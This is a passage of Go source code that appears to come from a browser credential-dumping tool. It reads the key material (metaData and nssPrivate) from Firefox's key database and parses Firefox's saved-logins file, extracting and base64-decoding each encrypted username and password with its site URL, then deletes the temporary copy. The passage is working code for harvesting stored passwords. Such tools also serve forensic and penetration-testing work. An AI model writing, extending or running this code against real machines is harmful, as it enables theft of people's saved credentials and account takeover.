if err = keyDB.QueryRow(queryMetaData).Scan(&item1, &item2); err != nil {
return nil, nil, nil, nil, err
}
if err = keyDB.QueryRow(queryNssPrivate).Scan(&a11, &a102); err != nil {
return nil, nil, nil, nil, err
}
return item1, item2, a11, a102, nil
}
func getFirefoxLoginData() (l []loginData, err error) {
s, err := os.ReadFile(item.TempFirefoxPassword)
if err != nil {
return nil, err
}
defer os.Remove(item.TempFirefoxPassword)
h := gjson.GetBytes(s, "logins")
if h.Exists() {
for _, v := range h.Array() {
var (
m loginData
user []byte
pass []byte
)
m.LoginURL = v.Get("formSubmitURL").String()
user, err = base64.StdEncoding.DecodeString(v.Get("encryptedUsername").String())
if err != nil {
return nil, err
}
pass, err = base64.StdEncoding.DecodeString(v.Get("encryptedPassword").String())
if err != nil {
return nil, err
}
m.encryptUser = user
m.encryptPass = pass
m.CreateDate = typeutil.TimeStamp(v.Get("timeCreated").Int() / 1000)
l = append(l, m)
}
}
return l, nil
}
func (f *FirefoxPassword) Name() string {
return "password"
}
func (f *FirefoxPassword) Length() int {
return len(*f)
}